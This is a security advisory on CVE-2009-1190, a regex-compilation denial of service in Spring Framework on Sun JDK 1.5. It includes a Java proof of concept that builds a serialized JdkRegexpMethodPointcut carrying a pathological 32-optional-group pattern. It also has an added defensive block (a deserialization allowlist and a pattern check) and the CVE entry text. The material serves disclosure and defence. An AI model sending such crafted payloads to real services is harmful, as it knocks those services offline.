CVE-2009-1190: Spring Framework Remote Denial of Service vulnerability

Severity: Low

Vendor: SpringSource

Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note: 2.x is not affected, since dm Server 2.x requires a 1.6 JDK)

Description:
The java.util.regex.Pattern.compile method in the Sun 1.5 JDK has a problem ([1], [2]) with exponential compilation times when a pattern uses optional groups. A workaround [3] was implemented in 1.4.2_06, but the root cause of the poor performance in regex processing was not resolved until JDK 1.6.

JdkRegexpMethodPointcut calls Pattern.compile(source[i]) via its inherited readObject method (from AbstractRegexpMethodPointcut). When an application running on a Sun 1.5 JVM with spring.jar on its classpath accepts serialized data, an attacker could supply a long regex string with many optional groups to consume enormous CPU resources. With a few such requests, all listeners will be occupied compiling regex expressions forever.

Mitigation:
- Users of all products may upgrade to JRE/JDK 1.6, which includes the fix for the root cause
- Spring Framework 2.5.6.SEC01 has been released for Community users and includes a workaround for the root cause
- Spring Framework 2.5.6.SR2 is available for Enterprise users and includes a workaround for the root cause
- Disable functionality that accepts serializable data from untrusted sources
- dm Server 1.0.3, which includes a workaround for the root cause, will be released shortly
- Instrumented Spring Framework 2.5.6.SR2, which includes a workaround for the root cause, will be released shortly

Example:

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import org.springframework.aop.support.JdkRegexpMethodPointcut;

public class DoSSpring {

    static byte[] getSerialized(Object o) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.flush();
        oos.close();
        return baos.toByteArray();
    }

    public static void main(String[] a) throws Exception {
        // 32 optional groups: the shape the 1.5 JDK compiler handles in exponential time
        String thePattern = "(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)"
                + "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)"
                + "?(W)?(I)?(U)?(a)?$";
        String longerPattern = thePattern.substring(0, thePattern.length() - 1) + thePattern;
        int length = longerPattern.length();
        // setPattern() compiles the regex at once, which would stall this process as well,
        // so a placeholder of the same length is serialized instead
        String fakePattern = longerPattern.replaceAll(".", "A");
        JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
        jrmp.setPattern(fakePattern);
        System.out.println(jrmp);
        byte[] theArray = getSerialized(jrmp);
        // locate the placeholder inside the serialized form and overwrite it with the real pattern
        int i = 0;
        for (; i + 1 < theArray.length; i++) {
            if (((char) theArray[i]) == 'A' && ((char) theArray[i + 1]) == 'A') {
                break;
            }
        }
        System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);
        // the inherited readObject() recompiles the pattern on the receiving side
        ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
        ObjectInputStream ois = new ObjectInputStream(bis);
        Object o = ois.readObject(); // returns after a very very long time
    }
}

Credit:
This issue was discovered by the RedHat Security Response Team

References:
[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
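The mitigation bullet about not accepting serializable data from untrusted sources, together with the pattern shape the description gives, can be enforced in code. The block below is an added, defender-side example; it is not part of the advisory and not Spring's own code. It assumes Java 9 or later (java.io.ObjectInputFilter did not exist in the 1.5/1.6 JDKs the advisory targets), the allowlist contents, the depth/byte limits and the pattern-size limits are illustrative choices, and java.util.HashMap stands in for the Spring pointcut class as the rejected sample because spring.jar is not assumed on the classpath.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.List;

public class DeserializationGuard {

    // Hypothetical allowlist for an endpoint that only ever expects a list of
    // strings. Patterns are matched in order and the first match wins, so the
    // trailing "!*" rejects every class not named before it, including
    // org.springframework.aop.support.JdkRegexpMethodPointcut from the advisory.
    // maxdepth and maxbytes are illustrative limits, not values from the advisory.
    private static final ObjectInputFilter ALLOW_LIST = ObjectInputFilter.Config.createFilter(
            "java.util.ArrayList;java.lang.String;!*;maxdepth=4;maxbytes=65536");

    // Illustrative bounds for a regex that arrives from outside the process.
    static final int MAX_PATTERN_LENGTH = 256;
    static final int MAX_OPTIONAL_GROUPS = 8;

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(o);
        }
        return baos.toByteArray();
    }

    // Deserialize with the allowlist installed; a stream carrying any other
    // class fails with InvalidClassException before that class's readObject runs.
    static Object deserializeGuarded(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOW_LIST);
            return ois.readObject();
        }
    }

    // Reject a pattern that is too long or stacks too many optional groups
    // before it ever reaches Pattern.compile. Counting ")?" is a crude proxy
    // for the "(X)?(Y)?..." shape the advisory describes.
    static boolean isAcceptablePattern(String regex) {
        if (regex == null || regex.length() > MAX_PATTERN_LENGTH) {
            return false;
        }
        int optionalGroups = 0;
        for (int i = 0; i + 1 < regex.length(); i++) {
            if (regex.charAt(i) == ')' && regex.charAt(i + 1) == '?') {
                optionalGroups++;
            }
        }
        return optionalGroups <= MAX_OPTIONAL_GROUPS;
    }

    public static void main(String[] args) throws Exception {
        // Constructed input of the expected type passes the filter.
        List<String> expected = new ArrayList<>(List.of("get*", "set*"));
        System.out.println("allowed: " + deserializeGuarded(serialize(expected)));

        // A class outside the allowlist is rejected; HashMap stands in for the
        // Spring pointcut class, which is not on this example's classpath.
        try {
            deserializeGuarded(serialize(new java.util.HashMap<String, String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // The advisory's pattern (32 optional groups) fails the regex guard.
        String thePattern = "(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)"
                + "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)"
                + "?(W)?(I)?(U)?(a)?$";
        System.out.println("advisory pattern acceptable: " + isAcceptablePattern(thePattern));
        System.out.println("simple pattern acceptable: " + isAcceptablePattern("get.*|set.*"));
    }
}
```

The two guards address different layers: the ObjectInputFilter stops a serialized JdkRegexpMethodPointcut (or any other unexpected class) before its readObject is invoked, which is the path the advisory describes, while isAcceptablePattern is the check to apply wherever a regex is accepted as plain data and later compiled. On the affected JDK 1.5 neither API exists, so there the advisory's own mitigations (JDK 1.6 or the patched Spring builds) remain the fix.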
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1190 to the following vulnerability:

Name: CVE-2009-1190
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1190
Assigned: 20090331
Reference: BUGTRAQ:20090424 CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
Reference: URL: http://www.securityfocus.com/archive/1/archive/1/502926/100/0/threaded
Reference: MISC: http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
Reference: CONFIRM: http://www.springsource.com/securityadvisory
Reference: CONFIRM: https://bugzilla.redhat.com/show_bug.cgi?id=497161
Reference: SECUNIA:34892
Reference: URL: http://secunia.com/advisories/34892
Reference: XF:springframework-data-dos(50083)
Reference: URL: http://xforce.iss.net/xforce/xfdb/50083

Algorithmic complexity vulnerability in the java.util.regex.Pattern.compile method in Sun Java Development Kit (JDK) before 1.6, when used with spring.jar in SpringSource Spring Framework 1.1.0 through 2.5.6 and 3.0.0.M1 through 3.0.0.M2 and dm Server 1.0.0 through 1.0.2, allows remote attackers to cause a denial of service (CPU consumption) via serializable data with a long regex string containing multiple optional groups, a related issue to CVE-2004-2540.
Statement: This flaw affected JBoss Enterprise BRMS Platform 5.1.0 when run on Sun JDK 1.5.x. It was resolved in JBoss Enterprise BRMS Platform 5.2.0, both by updating spring and by dropping support for Sun JDK 1.5.x.